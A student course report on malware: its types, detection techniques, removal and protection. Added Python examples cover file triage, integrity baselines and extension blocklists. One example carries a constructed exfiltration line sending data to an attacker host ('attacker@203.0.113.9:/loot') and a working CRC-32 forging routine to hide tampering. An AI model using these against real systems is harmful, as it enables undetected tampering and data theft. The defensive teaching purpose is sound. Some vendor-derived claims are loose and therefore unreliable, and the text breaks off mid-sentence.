St. Mary's University
Computer Application in Management
Title: Malware
Management-E
Name: Ekram Mustefa (RMD/2015/2014)
Submitted to: Mr. Kiros Aynalem
Submitted date: May 13, 2023
Contents
What is malware?
How to protect against malware
Types of malware
  • Phishing
  • Spyware
  • Adware
  • Viruses
  • Exploits and exploit kits
  • Fileless malware
  • Macro malware
  • Ransomware
  • Rootkits
  • Supply chain attacks
  • Tech support scams
  • Trojans
  • Unwanted software
  • Worms
  • Coin miners
Types of malware attacks
  1) Adware
  2) Fileless malware
  3) Viruses
  4) Worms
  5) Trojans
  6) Bots
  7) Ransomware
  8) Spyware
  9) Mobile malware
  10) Rootkits
How to detect and remove malware
Malware detection
  10 malware detection techniques
    1. Signature-based detection
    2. Static file analysis
    3. Dynamic malware analysis
    4. Dynamic monitoring of mass file operations
    5. File extensions blocklist/blocklisting
    6. Application allowlist/allowlisting
    7. Malware honeypot/honeypot files
    8. Checksumming/cyclic redundancy check (CRC)
    9. File entropy/measuring changes of a file's data
    10. Machine learning behavioural analysis
Malware removal
Malware protection
  • Install an antivirus program
  • Implement advanced email and endpoint protections
  • Hold regular trainings
  • Take advantage of cloud backups
  • Adopt a Zero Trust model
  • Join an information-sharing group
  • Maintain offline backups
  • Keep software up to date
  • Create an incident response plan
  Types of advanced malware protection
    Prevention
    Detection
    Response
    Efficiency
  10 malware protection best practices
    1. Update your frontline defenses
    2. Back up data and test restore procedures
    3. Protect against malware
    4. Educate users on threat sources
    5. Partition your network
    6. Leverage email security
    7. Use security analytics
    8. Create a set of instructions for IT staff
    9. Practice prevention and remediation
    10. Deploy a zero-trust security framework
What is malware?
Malware is a term used to describe any software that is specially
designed to disrupt, damage, or gain unauthorised access to a
computer system. Examples of common malware include viruses,
worms, Trojans, spyware, adware, and ransomware. Recent malware
attacks have exfiltrated data in mass amounts.
Malware, or "malicious software," is an umbrella term that
describes any malicious program or code that is harmful to
systems.
Hostile, intrusive, and intentionally nasty, malware seeks to
invade, damage, or disable computers, computer systems,
networks, tablets, and mobile devices, often by taking partial
control over a device's operations. Like the human flu, it
interferes with normal functioning.
The motives behind malware vary. Malware can be about making
money off you, sabotaging your ability to get work done, making a
political statement, or just bragging rights. Although malware
cannot damage the physical hardware of systems or network
equipment (with one known exception—see the Google Android
section below), it can steal, encrypt, or delete your data, alter or
hijack core computer functions, and spy on your computer
activity without your knowledge or permission.
How to protect against malware
In no particular order, here are our tips on protecting against
malware.
1. Pay attention to the domain and be wary if the site isn't a
top-level domain, i.e., com, mil, net, org, edu, or biz, to name a few.
2. Use strong passwords with multi-factor authentication. A
password manager can be a big help here.
3. Avoid clicking on pop-up ads while browsing the Internet.
4. Avoid opening email attachments from unknown senders.
5. Do not click on strange, unverified links in emails, texts, and
social media messages.
6. Don't download software from untrustworthy websites or
peer-to-peer file transfer networks.
7. Stick to official apps from Google Play and Apple's App Store on
Android, OS X, and iOS (and don't jailbreak your phone). PC users
should check the ratings and reviews before installing any
software.
8. Make sure your operating system, browsers, and plugins are
patched and up to date.
9. Delete any programs you don't use anymore.
10. Back up your data regularly. If your files become damaged,
encrypted, or otherwise inaccessible, you'll be covered.
11. Download and install a cyber-security program that actively
scans and blocks threats from getting on your device.
Malwarebytes, for example, offers proactive cyber-security programs
for Windows, Mac, Android, and Chromebook, plus its latest
offering, Malwarebytes Browser Guard. It's free and it's the only
browser extension that can stop tech support scams along with
any other unsafe and unwanted content that comes at you
through your browser.
Types of malware
Malware comes in many forms—here are a few common types.
• Phishing
A phishing attack poses as a credible source to steal
sensitive information through emails, websites, text
messages, or other forms of electronic communication.
These attacks provide a delivery mechanism for malware.
Common attacks steal usernames, passwords, credit card
details, and banking information. These types of malware
attacks may lead to identity theft or money stolen directly
from someone's personal bank account or credit card.
For example, a cybercriminal might pose as a well-known
bank and send an email alerting someone that their account
has been frozen because of suspicious activity, urging them
to click a link in the email to address the issue. Once they
click the link, malware is installed.
• Spyware
Spyware works by installing itself on a device without
someone’s consent or providing adequate notice. Once
installed, it can monitor online behaviour, collect sensitive
information, change device settings, and decrease device
performance.
• Adware
Like spyware, adware installs itself on a device without
someone's consent. But in the case of adware, the focus is on
displaying aggressive advertising, often in popup form, to
make money off clicks. These ads frequently slow a device's
performance. More dangerous types of adware can also
install additional software, change browser settings, and
leave a device vulnerable to other malware attacks.
• Viruses
Viruses are designed to interfere with a device’s normal
operation by recording, corrupting, or deleting its data. They
often spread themselves to other devices by tricking people
into opening malicious files.
• Exploits and exploit kits
Exploits use vulnerabilities in software to bypass a
computer's security safeguards and infect a device. Malicious
hackers scan for outdated systems that contain critical
vulnerabilities, and then exploit them by deploying malware.
By including shellcode in an exploit, cybercriminals can
download more malware that infects devices and infiltrates
organizations.
Exploit kits contain a collection of exploits that scan for
different types of software vulnerabilities. If any are
detected, the kits deploy additional malware. Software that
can be infected includes Adobe Flash Player, Adobe Reader,
web browsers, Oracle Java, and Sun Java. Angler/Axpergle,
Neutrino, and Nuclear are a few types of common exploit
kits.
Exploits and exploit kits usually rely on malicious websites
or email attachments to breach a network or device, but
sometimes they also hide in ads on legitimate websites
without the website even knowing.
• Fileless malware
This type of cyber-attack broadly describes malware that
doesn't rely on files—like an infected email attachment—to
breach a network. For example, it may arrive through
malicious network packets that exploit a vulnerability and
then install malware that lives only in kernel memory.
Fileless threats are especially difficult to find and remove
because most antivirus programs aren't built to scan
firmware.
• Macro malware
You may already be familiar with macros—ways to quickly
automate common tasks. Macro malware takes advantage of
this functionality by infecting email attachments and ZIP
files. To trick people into opening the files, cybercriminals
often hide the malware in files disguised as invoices,
receipts, and legal documents.
In the past, macro malware was more common because
macros ran automatically when a document was opened. But
in recent versions of Microsoft Office, macros are disabled by
default, meaning that cybercriminals who infect devices in
this way have to convince users to turn macros on.
• Ransomware
Ransomware is a type of malware that threatens a victim by
destroying or blocking access to critical data until a ransom
is paid. Human-operated ransomware attacks target an
organization through common system and security
misconfigurations that infiltrate the organization, navigate
its enterprise network, and adapt to the environment and
any weaknesses. A common method of gaining access to an
organization’s network to deliver ransomware is through
credential theft, in which a cybercriminal could steal an
actual employee’s credentials to pose as them and gain
access to their accounts.
Attackers using human-operated ransomware target large
organizations because they can pay a higher ransom than
the average individual—often many millions of dollars.
Because of the high stakes involved with a breach of this
scale, many organizations opt to pay the ransom rather than
have their sensitive data leaked or risk further attacks from
the cybercriminals, even though payment does not
guarantee the prevention of either outcome.
As human-operated ransomware attacks grow, the criminals
behind the attacks become more organized. In fact, many
ransomware operations now use a Ransomware as a Service
model, meaning that a set of criminal developers create the
ransomware itself and then hire other cybercriminal
affiliates to hack an organization’s network and install the
ransomware, splitting the profits between the two groups at
an agreed-on rate.
• Rootkits
When a cybercriminal uses a rootkit, they hide malware on a
device for as long as possible, sometimes even years, so that
it steals information and resources on an ongoing basis. By
intercepting and changing standard operating system
processes, a rootkit may alter the information that your
device reports about itself. For example, a device infected
with a rootkit may not show an accurate list of programs
that are running. Rootkits may also give administrative or
elevated device privileges to cybercriminals, so they gain
complete control of a device and can perform potentially
malicious actions, such as stealing data, spying on the victim,
and installing additional malware.
• Supply chain attacks
This type of malware targets software developers and
providers by accessing source code, build processes, or
update mechanisms in legitimate apps. Once a
cybercriminal has found an unsecured network protocol,
unprotected server infrastructure, or an unsafe coding practice,
they break in, change the source code, and hide malware in
build and update processes.
• Tech support scams
An industry-wide issue, tech support scams use scare tactics
to trick users into paying for unnecessary technical support
services that may be advertised to fix a falsified problem
relating to a device, a platform, or software. With this type of
malware, a cybercriminal may call someone directly and
pretend to be an employee of a software company. Once
they’ve gained someone’s trust, attackers often urge
potential victims to install applications or give remote access
to their devices.
• Trojans
Trojans rely on a user unknowingly downloading them
because they appear to be legitimate files or apps. Once
downloaded, they may:
  • Download and install additional malware, such as viruses
  or worms.
  • Use the infected device for click fraud.
  • Record the keystrokes and websites that you visit.
  • Send information (for example, passwords, login details,
  and browsing history) about the infected device to a
  malicious hacker.
  • Give a cybercriminal control over the infected device.
• Unwanted software
When a device has unwanted software, the user may
experience a modified web browsing experience, altered
control of downloads and installations, misleading messages,
and unauthorized changes to device settings. Some
unwanted software is bundled with software that people
intend to download.
• Worms
Mostly found in email attachments, text messages,
file-sharing programs, social networking sites, network shares,
and removable drives, a worm spreads through a network
by exploiting security vulnerabilities and copying itself.
Depending on the type of worm, it might steal sensitive
information, change your security settings, or stop you from
accessing files.
• Coin miners
With the rise in popularity of cryptocurrencies, mining coins
has become a lucrative practice. Coin miners use a device's
computing resources to mine for cryptocurrencies.
Infections of this type of malware often begin with an email
attachment that attempts to install malware or a website
that uses vulnerabilities in web browsers or takes advantage
of computer processing power to add malware to devices.
Using complex mathematical calculations, coin miners
maintain the blockchain ledger to steal computing resources
that allow the miner to create new coins. Coin mining takes
significant computer processing power, however, to steal
relatively small amounts of cryptocurrency. For this
reason, cybercriminals often work in teams to maximize and
split profits.
Not all coin miners are criminal, though—individuals and
organizations sometimes purchase hardware and electrical
power for legitimate coin mining. The act becomes criminal
when a cybercriminal infiltrates a corporate network without
its knowledge to use its computing power for mining.
Types of malware attacks
1) Adware
Adware — commonly called “spam” — serves unwanted or
malicious advertising. While relatively harmless, it can be
irritating as adware can hamper your computer’s performance. In
addition, these ads may lead users to download more harmful
types of malware inadvertently. To defend against adware, make
sure you keep your operating system, web browser, and email
clients updated so they can block known adware attacks before
they are able to download and install.
2) Fileless Malware
Unlike traditional malware, which uses executable files to infect
devices, fileless malware doesn’t directly impact files or the file
system. Instead, this type of malware uses non-file objects like
Microsoft Office macros, PowerShell, WMI, and other system
tools. According to recent research, 40% of global malware
is fileless.
In addition, fileless malware increased by almost 900% year-
over-year in 2020. A notable example of a fileless malware attack
was Operation Cobalt Kitty, in which the Ocean Lotus Group
infiltrated several corporations and conducted nearly six months
of stealthy operations before being detected.
Because there’s no executable file, it is difficult for antivirus
software to protect against fileless malware. The best way to limit
what fileless malware can do is to limit users’ credentials. By
employing least privilege access, where users are only given the
rights and privileges needed to do a specific task, an organization
also limits the risk of fileless malware. Multi-factor
authentication (MFA), as well as employing a zero trust network
access (ZTNA), can also limit the attack surface for fileless
malware.
3) Viruses
A virus infects other programs and can spread to other systems,
in addition to performing its own malicious acts. A virus is
attached to a file and is executed once the file is launched. The
virus will then encrypt, corrupt, delete, or move your data and
files.
To defend against viruses, an enterprise-level antivirus solution
can help you protect all your devices from a single location while
maintaining central control and visibility. Make sure that you run
full scans frequently and keep your antivirus definitions up to
date.
4) Worms
Like a virus, a worm can duplicate itself in other devices or
systems. Unlike viruses, worms do not need human action to
spread once they are in a network or system. Worms often attack
a computer’s memory or hard drive. To protect yourself against
worms you should make sure every device is updated with the
latest patches. Technology like firewalls and email filtering will
also help you detect files or links that may contain a worm.
5) Trojans
A Trojan program pretends to be a legitimate one, but it is in fact
malicious. A Trojan can't spread by itself like a virus or worm, but
instead must be executed by its victim, often through social
engineering tactics such as phishing. Trojans rely on social
engineering to spread, which puts the burden of defense on users.
Unfortunately, in 2022, 82% of breaches involved the human
element. Security awareness training is crucial for protecting
against Trojans, as employees are both the targets and the first
line of defense against these kinds of attacks.
6) Bots
A bot is a software program that performs an automated task
without requiring any interaction. Bots can execute attacks much
faster than humans ever could.
A computer with a bot infection can spread the bot to other
devices, creating what’s known as a botnet. This network of bot-
compromised machines can then be controlled and used to launch
massive attacks — such as DDoS attacks or brute force attacks —
often without the device owner being aware of its role in the
attack. Bots are also used for crypto mining on specific hardware.
One way to control bots is to use tools that help determine if
traffic is coming from a human user or a bot.
For example, you can add CAPTCHAs to your forms to prevent
bots from overwhelming your site with requests. This can help
you identify and separate good traffic from bad. Site traffic should
always be monitored, and organizations should make sure they’re
using updated browsers and user agents.
7) Ransomware
Arguably the most common form of malware, ransomware
attacks encrypt a device's data and hold it for ransom. If the
ransom isn't paid by a certain deadline, the threat actor threatens
to delete or release the valuable data (often opting to sell it on the
dark web).
Ransomware attacks have increased by 13 percent year-over-year,
and are some of the most newsworthy malware types due to
their impact on hospitals, telecommunications firms, railway
networks, and governmental offices. Ransomware gangs, as well
as individual actors, are continuing to see the payoff in targeting
high-value organizations like supply chains and critical
infrastructure.
In the beginning of 2022, the Costa Rican government was
attacked by ransomware, affecting finance and other government
services to such a degree that a state of emergency was declared.
Employing an MDR solution can help an organization not only
monitor their networks but act fast in case of an attack. In
addition, security awareness training can help users detect and
prevent suspicious activity.
8) Spyware
Cybercriminals use spyware to monitor the activities of users. By
logging the keystrokes a user inputs throughout the day, the
malware can provide access to usernames, passwords, and
personal data. Spyware often leads to credential theft, which in
turn can lead to a devastating data breach. It often originates in
corrupt files, or through downloading suspicious files.
• Keyloggers are a common kind of spyware that monitors and
records users' keystrokes. With this kind of spyware, hackers can
steal credentials as well as credit card numbers and other data
that may be entered into a system through typing.
In addition to antivirus software, training employees and
employing multi-factor authentication can be used to prevent
spyware or the resulting credential theft.
9) Mobile Malware
As the name suggests, mobile malware is designed specifically to
target mobile devices. This kind of malware has become more
common not just with the proliferation of smartphones, but with
the increase of mobile and tablet use by organizations and
employees.
Mobile malware can employ several tactics, including spying on
and recording texts and phone calls, impersonating common apps,
stealing credentials (for banking accounts or other applications),
or accessing data on the device. Mobile malware often spreads
through smishing (also known as SMS phishing).
This is where, once again, security awareness training can be
crucial — since many employees utilize their mobile devices for
work.
10) Rootkits
Rootkits were not originally designed as malware, but they have
become a common attack vector for hackers. A rootkit allows a
user to maintain privileged access within a system without being
detected.
In short, rootkits give a user administrative-level access while
concealing that access. To prevent rootkits from doing damage,
organizations need to revoke privileged access and employ a zero
trust approach, where every user must be verified. Organizations
should also employ multi-factor authentication to prevent
single-credential access.
How to detect and remove malware
Malware isn’t always easily detectable, especially in the case of
fileless malware. It’s a good idea for organizations and individuals
alike to keep an eye out for an increase in popup ads, web
browser redirects, suspicious posts on social media accounts, and
messages about compromised accounts or device security.
Changes to a device’s performance, such as it running much more
slowly, may also be an indicator of concern.
If you’re worried that you’ve become a victim of a malware attack,
fortunately, you have options for detection and removal. As a first
step, take advantage of antivirus products, like the one offered
natively in Windows to scan for malware. Once you’ve installed an
antivirus program, run a device scan to look for any malicious
programs or code. If the program detects malware, it will list the
type and provide recommendations for removal. After removal,
be sure to keep the software updated and running to prevent
future attacks.
For more sophisticated attacks against organizations that
antivirus programs are unable to detect and block, Security
Information and Event Management (SIEM) and Extended
Detection and Response (XDR) tools provide security
professionals with cloud-powered endpoint security methods that
help detect and respond to attacks on endpoint devices. Because
these types of attacks are multifaceted, with cybercriminals
targeting more than just control of devices, SIEM and XDR help
enable organizations to see an attack’s bigger picture across all
domains—including devices, emails, and applications.
Getting started with SIEM & XDR tools, such as Microsoft
Sentinel, Microsoft 365 Defender, and Microsoft Defender for
Cloud, is a strong starting place for antivirus capabilities. Security
professionals should ensure that device settings are always
updated to match the latest recommendations to help prevent
malware threats.
Malware detection
Malware detection is a critical set of defensive techniques used to
identify, block and prevent the harmful effects of malware.
Malicious software compromises systems by exploiting
bugs in legitimate software. Malware detection techniques
include signature-based detection, dynamic and static analysis,
file extension blocklisting and machine learning behavioural
analysis. CrowdStrike's Falcon Prevent next-generation antivirus
is an AI/ML-based technology that offers
comprehensive protection from malware and presents attacks in
an easy-to-understand process tree. Basic techniques of malware
detection include signature-based detection, checksumming and
application allowlisting, while advanced techniques use artificial
intelligence and machine learning. These advanced techniques
proactively look for unknown malware threats before they can do
damage to computer systems.
10 Malware Detection Techniques
An effective security practice uses a combination of expertise
and technology to detect and prevent malware. Tried and
proven techniques include:
1. Signature-based detection
Signature-based detection matches known digital indicators of
malware, such as file hashes, byte patterns, domain names and IP
addresses, against what is observed on a system. Lists of such
indicators of compromise (IOCs), often kept in a database, can be
used to identify a breach. While IOCs are effective at identifying
known malicious activity, they are reactive: a signature exists
only after a sample has been seen and analysed, and a trivially
modified sample no longer matches. For that reason CrowdStrike
also uses indicators of attack (IOAs), which describe attacker
behaviour rather than specific artifacts, to identify in-progress
attacks.
2. Static file analysis
Static file analysis examines a file without running it to
identify signs of malicious intent. File names, hashes, embedded
strings such as IP addresses and URLs, and file header data (for
example the PE or ELF header with its sections and imports) can
all be evaluated to judge whether a file is malicious. Static
analysis is a good starting point, but a packed or obfuscated file
reveals little this way, so proficient security teams use
additional techniques to detect advanced malware that goes
unidentified by static analysis.
3. Dynamic malware analysis
Dynamic malware analysis executes suspected malicious code in an
isolated environment called a sandbox. This closed system lets
security professionals watch and study the malware in action,
recording process creation, file and registry changes and network
connections, without the risk of it infecting their systems or
escaping into the enterprise network. The caveat is that some
malware checks for sandbox or virtual-machine artifacts, or simply
sleeps past the analysis window, and behaves benignly when it
suspects it is being watched.
4. Dynamic monitoring of mass file operations
Observing mass file operations, such as bursts of rename,
overwrite or delete commands, identifies signs of tampering or
corruption; ransomware encrypting a file share produces exactly
this pattern. Dynamic monitoring often relies on a file integrity
monitoring (FIM) tool that keeps a baseline of file hashes and
permissions and analyses the integrity of file systems through
both reactive forensic auditing and proactive rule-based alerting.
5. File extensions blocklist/blocklisting
A file extension is the text after the final period in a file
name; it indicates the file's format, and the operating system
uses it to decide how to open the file. Attackers use this to
package malware for delivery, for example an executable or script
named to look like a document. A common security measure is
therefore to list known dangerous extension types (.exe, .scr,
.js, .vbs and the like) in a blocklist so that unsuspecting users
cannot download or open such files. A blocklist only covers what
is on it: a file type that was never listed, or a malicious file
inside an archive, passes, so it should be paired with inspection
of the file's actual content.
6. Application allowlist/allowlisting
Allowlisting is the opposite of blocklisting: an organization
authorizes a system to run only the applications on an approved
list, identified by hash, publisher signature or path, and
everything else is denied. Allowlisting can be very effective at
preventing unauthorized applications through its rigid rules.
However, it can be difficult to manage and can reduce an
organization's operational speed and flexibility, since every
update to an approved application must be approved again.
7. Malware honeypot/honeypot files
A malware honeypot mimics a software application or an
application programming interface (API) to draw out malware
attacks in a controlled, non-threatening environment. Similarly,
a honeypot file is a decoy file that no legitimate user or process
should touch, so that any read, rename or encryption of it is a
high-fidelity sign of an attacker or of ransomware at work. In
both cases security teams can analyse the attack techniques and
develop or enhance antimalware defences against these specific
vulnerabilities, threats or actors.
8. Checksumming/cyclic redundancy check (CRC)
A checksum is a calculation over a collection of data, such as a
file, used to confirm its integrity. One of the most common is the
cyclic redundancy check (CRC), the remainder of dividing the data
by a fixed polynomial, which is sensitive to both the value and
the position of every bit. Checksumming is effective at
identifying accidental corruption but is not a defence against
deliberate tampering: a CRC is not a cryptographic hash, so an
attacker who modifies a file can simply recompute it, or append a
few bytes chosen so that the original CRC still matches. Detecting
tampering needs a cryptographic hash such as SHA-256.
9. File entropy/measuring changes of a files’ data
As detection improves, adversaries increasingly pack or encrypt
their executables so that every copy looks different. Compressed
or encrypted data is close to random, so such files have high
entropy, near the maximum of 8 bits per byte, whereas ordinary
code and text score noticeably lower. Measuring the entropy of a
file, or of each section of an executable, therefore flags likely
packed malware. The caveat is that legitimately compressed files
(archives, images, media) also have high entropy, so entropy is a
triage signal to combine with other evidence, not a verdict.
10. Machine learning behavioural analysis
Machine learning (ML) is a subset of artificial intelligence (AI)
and refers to training algorithms on existing data so that they
can classify new data. In malware detection, models trained on
file features and on runtime behaviour can identify patterns and
use them to detect novel, previously unseen malware. Such models
still need retraining as malware changes, and attackers probe
them for features they can alter without changing what the
malware does.
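The following is an added example, not code from the report or from any vendor named above. It ties together three of the techniques in the list (signature/IOC matching by hash from item 1, static inspection of header and strings from item 2, and entropy measurement from item 9) in one static triage routine. The IOC list, the entropy cut-off of 7.2 bits per byte and all sample files are constructed for the example; the "packed" sample is seeded random data standing in for an encrypted section.

```python
# Added example (not from the original report): static triage of a file image
# without executing it. It combines three techniques from the list above:
# signature/IOC matching by SHA-256, static inspection of the header and the
# embedded strings, and Shannon entropy as an indicator of packing/encryption.
import hashlib
import math
import random
import re
from collections import Counter

# Assumed IOC list of known-bad SHA-256 digests, as an EDR would pull from
# threat intelligence. Constructed for this example.
KNOWN_BAD_SHA256 = {hashlib.sha256(b"EVIL-SAMPLE-1").hexdigest()}

IPV4_RE = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b")
STRINGS_RE = re.compile(rb"[\x20-\x7e]{6,}")   # printable runs, as `strings` does
ENTROPY_PACKED_THRESHOLD = 7.2                 # bits per byte; assumed cut-off


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant byte, at most 8.0."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def file_type(data: bytes) -> str:
    """Classify by magic bytes, not by the file extension a user sees."""
    if data[:2] == b"MZ":
        return "PE"
    if data[:4] == b"\x7fELF":
        return "ELF"
    return "unknown"


def triage(data: bytes) -> dict:
    """Return static findings and the reasons the file looks suspicious."""
    sha256 = hashlib.sha256(data).hexdigest()
    ips = sorted({m.decode() for m in IPV4_RE.findall(data)})
    entropy = shannon_entropy(data)
    kind = file_type(data)
    reasons = []
    if sha256 in KNOWN_BAD_SHA256:
        reasons.append("SHA-256 matches IOC list")
    if ips:
        reasons.append("embedded IPv4 addresses: " + ", ".join(ips))
    if kind != "unknown" and entropy > ENTROPY_PACKED_THRESHOLD:
        reasons.append(f"{kind} with entropy {entropy:.2f} bits/byte, likely packed")
    return {
        "sha256": sha256,
        "type": kind,
        "entropy": round(entropy, 3),
        "ips": ips,
        "strings": len(STRINGS_RE.findall(data)),
        "suspicious": bool(reasons),
        "reasons": reasons,
    }


# Constructed sample files (not real malware).
SAMPLE_KNOWN_BAD = b"EVIL-SAMPLE-1"
SAMPLE_CLEAN = b"MZ" + b"\x00" * 64 + b"Hello from a harmless program"
SAMPLE_BEACON = b"MZ" + b"\x00" * 128 + b"connect to 203.0.113.45:443 and wait"
_rng = random.Random(7)   # seeded so the "packed" sample is reproducible
SAMPLE_PACKED = b"MZ" + bytes(_rng.getrandbits(8) for _ in range(4096))

if __name__ == "__main__":
    for name, data in [("known-bad", SAMPLE_KNOWN_BAD), ("clean", SAMPLE_CLEAN),
                       ("beacon", SAMPLE_BEACON), ("packed", SAMPLE_PACKED)]:
        r = triage(data)
        print(f"{name}: type={r['type']} entropy={r['entropy']} "
              f"suspicious={r['suspicious']} {r['reasons']}")
```

Run as a script it prints one line per sample. The hash check fires only on the exact known-bad bytes, the beacon is flagged by its hard-coded address even though its hash is unknown, and the packed sample is flagged by entropy alone; the clean file trips none of the three, which is the point of layering them.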
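The next added example (again not from the report) covers items 4 and 8 together: a minimal file integrity baseline that records both a CRC-32 and a SHA-256 for every file, and a demonstration of why the CRC alone is not a tamper check. The attacker's edit is "repaired" by appending four bytes computed from the linearity of CRC-32 so that `zlib.crc32` of the tampered file equals the baseline value; the SHA-256 comparison still catches it. The "file system" is an in-memory dictionary and the file contents are constructed for the example.

```python
# Added example (not from the original report): a minimal file-integrity
# baseline over an in-memory "file system" (constructed dict of path -> bytes),
# showing why a CRC spots accidental corruption but not deliberate tampering:
# four appended bytes restore the original CRC-32, while SHA-256 still differs.
import hashlib
import zlib

CRC_POLY = 0xEDB88320  # reflected CRC-32 polynomial used by zlib

# Standard byte-wise CRC-32 table, plus a reverse map from an entry's top
# byte to its index (the 256 top bytes are a permutation of 0..255).
CRC_TABLE = []
for i in range(256):
    c = i
    for _ in range(8):
        c = (c >> 1) ^ CRC_POLY if c & 1 else c >> 1
    CRC_TABLE.append(c)
CRC_REV = {entry >> 24: idx for idx, entry in enumerate(CRC_TABLE)}
assert len(CRC_REV) == 256


def forge_crc32(data: bytes, target: int) -> bytes:
    """Append 4 bytes to data so that zlib.crc32(result) == target.

    CRC is linear over GF(2): feeding bytes b1..b4 from register R gives the
    same result as feeding four zero bytes from R XOR (b1|b2<<8|b3<<16|b4<<24).
    A zero-byte step is invertible, so run four of them backwards from the
    wanted final register and XOR against the register reached after data.
    """
    reg = zlib.crc32(data) ^ 0xFFFFFFFF      # register state after data
    x = target ^ 0xFFFFFFFF                   # register state wanted at the end
    for _ in range(4):                        # undo one zero-byte step each time
        idx = CRC_REV[x >> 24]
        x = (((x ^ CRC_TABLE[idx]) << 8) | idx) & 0xFFFFFFFF
    return data + (x ^ reg).to_bytes(4, "little")


def baseline(files: dict) -> dict:
    """Record CRC-32 and SHA-256 for every file, as a FIM tool does at install."""
    return {
        path: {"crc32": zlib.crc32(content),
               "sha256": hashlib.sha256(content).hexdigest()}
        for path, content in files.items()
    }


def verify(files: dict, base: dict) -> dict:
    """Compare the current state with the baseline; returns a finding per path."""
    findings = {}
    for path, ref in base.items():
        if path not in files:
            findings[path] = "deleted"
            continue
        content = files[path]
        crc_ok = zlib.crc32(content) == ref["crc32"]
        sha_ok = hashlib.sha256(content).hexdigest() == ref["sha256"]
        if crc_ok and sha_ok:
            findings[path] = "unchanged"
        elif crc_ok:
            findings[path] = "modified (CRC unchanged: crafted tamper)"
        else:
            findings[path] = "modified"
    for path in files.keys() - base.keys():
        findings[path] = "new file"
    return findings


# Constructed sample file system for the example.
FILES = {
    "/etc/hosts": b"127.0.0.1 localhost\n",
    "/usr/local/bin/backup.sh": b"#!/bin/sh\nrsync -a /data /mnt/backup\n",
}
BASE = baseline(FILES)

# The attacker edits the script, then repairs its CRC with four trailing bytes.
TAMPERED = dict(FILES)
EVIL = b"#!/bin/sh\nrsync -a /data attacker@203.0.113.9:/loot\n"  # constructed
TAMPERED["/usr/local/bin/backup.sh"] = forge_crc32(
    EVIL, BASE["/usr/local/bin/backup.sh"]["crc32"])
del TAMPERED["/etc/hosts"]

if __name__ == "__main__":
    for path, status in verify(TAMPERED, BASE).items():
        print(f"{path}: {status}")
```

The four appended bytes are harmless to a shell script (they land after the final newline) and cost the attacker nothing, which is why integrity baselines should record a cryptographic hash and why the baseline itself must live somewhere the monitored host cannot write.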
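A third added example (not from the report) puts item 5 and item 6 side by side: a file-extension blocklist in its naive form and a hardened form, and a hash-based application allowlist that decides by content rather than by name. The blocked-extension set, the approved tool and the test names are constructed for the example. The naive check is defeated by letter case, by trailing whitespace and by a file type it never listed; the hardened one normalises the name first and refuses names containing Unicode direction-override characters, which attackers use to make a name like `invoice<U+202E>fdp.exe` display as `invoiceexe.pdf`.

```python
# Added example (not from the original report): a file-extension blocklist next
# to a hash-based application allowlist. Lists and names are constructed.
import hashlib
import unicodedata

BLOCKED_EXTENSIONS = {"exe", "scr", "dll", "js", "vbs", "hta", "bat", "cmd", "ps1"}


def naive_blocklist_allows(filename: str) -> bool:
    """The obvious check: compare the text after the last dot, exactly as typed."""
    return filename.rsplit(".", 1)[-1] not in BLOCKED_EXTENSIONS


def hardened_blocklist_allows(filename: str) -> bool:
    """Normalise before deciding, and treat every extension in a chain as
    significant (conservative: invoice.exe.txt is refused as well)."""
    if any(unicodedata.category(ch) == "Cf" for ch in filename):
        return False                        # bidi overrides etc.: the displayed name lies
    cleaned = filename.strip(" .").lower()  # Windows drops trailing spaces/dots itself
    extensions = cleaned.split(".")[1:]     # everything after the base name
    return not any(ext in BLOCKED_EXTENSIONS for ext in extensions)


# Application allowlist: decide by what the file is, not what it is called.
APPROVED_TOOL = b"#!/bin/sh\necho 'approved backup tool'\n"    # constructed
APPROVED_SHA256 = {hashlib.sha256(APPROVED_TOOL).hexdigest()}


def allowlist_allows(content: bytes) -> bool:
    return hashlib.sha256(content).hexdigest() in APPROVED_SHA256


def decide(filename: str, content: bytes) -> str:
    """Layer both: a blocked name is refused early, and anything that is not
    on the allowlist is denied no matter what it is called."""
    if not hardened_blocklist_allows(filename):
        return "deny: blocked extension"
    if not allowlist_allows(content):
        return "deny: not on allowlist"
    return "allow"


if __name__ == "__main__":
    for name in ["setup.exe", "SETUP.EXE", "setup.exe ", "invoice\u202efdp.exe",
                 "payload.iso", "report.pdf"]:
        print(f"{name!r}: naive={naive_blocklist_allows(name)} "
              f"hardened={hardened_blocklist_allows(name)}")
    print(decide("backup.sh", APPROVED_TOOL), "|", decide("backup.sh", b"echo pwned\n"))
```

Note that even the hardened blocklist lets `payload.iso` through, because no list of bad extensions is ever complete; the allowlist denies the unknown content regardless of its name, which is the trade-off described above: stronger, but every legitimate new version has to be approved.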
Malware removal
Malware removal is an essential process for keeping personal
devices secure and running smoothly. Several free and paid software
options are available. Malwarebytes offers free antivirus software
that can remove threats such as viruses, ransomware, spyware,
adware and Trojans from personal devices, including Windows and
Mac computers, Android and Chromebook devices, and iOS devices.
Avast One is another free tool that scans for and removes existing
malware. Windows Security is the built-in scanning tool in
Windows 10 and later that can find and remove malware from PCs. To
use it, open Windows Security, select Virus & threat protection,
then Scan options, and choose Windows Defender Offline scan. The
offline scan restarts the machine and scans before Windows starts,
so that rootkits and other malware that hide from a running system
can be found and removed.
Malware protection
Malware protection is a crucial aspect of cyber security that helps
safeguard devices from the types of malicious software described
above: worms, Trojans, ransomware, spyware and adware. Email is
the most common delivery channel; by some vendor estimates more
than 90% of attacks begin with an email. It is therefore important
that email security includes a strong malware protection solution.
Good malware protection practice consists of installing robust
security solutions, enabling two-factor authentication, keeping
software up to date, limiting access privileges, and running
security awareness training. Mimecast, for example, offers a
cloud-based email threat protection and compliance service whose
malware protection aims to stop malicious attachments and links
before they reach the network. Anti-malware software on the device
scans files, detects and prevents infections using signatures,
heuristics and sandboxing, and removes the malware it finds.
Although anyone can become the victim of a malware attack,
there are many ways to prevent an attack from ever happening.
• Install an antivirus program
The best form of protection is prevention. Organizations can
block or detect many malware attacks with a trusted
security solution or antimalware service, such as Microsoft
Defender for Endpoint or Microsoft Defender Antivirus.
When you use a program like these, your device first scans
any files or links that you attempt to open to help ensure
they’re safe. If a file or website is malicious, the program will
alert you and suggest that you not open it. These programs
can also remove malware from a device that’s already
infected.
• Implement advanced email and endpoint protections
Help prevent malware attacks with Microsoft Defender for
Office 365, which scans links and attachments in emails and
collaboration tools, like SharePoint, OneDrive, and Microsoft
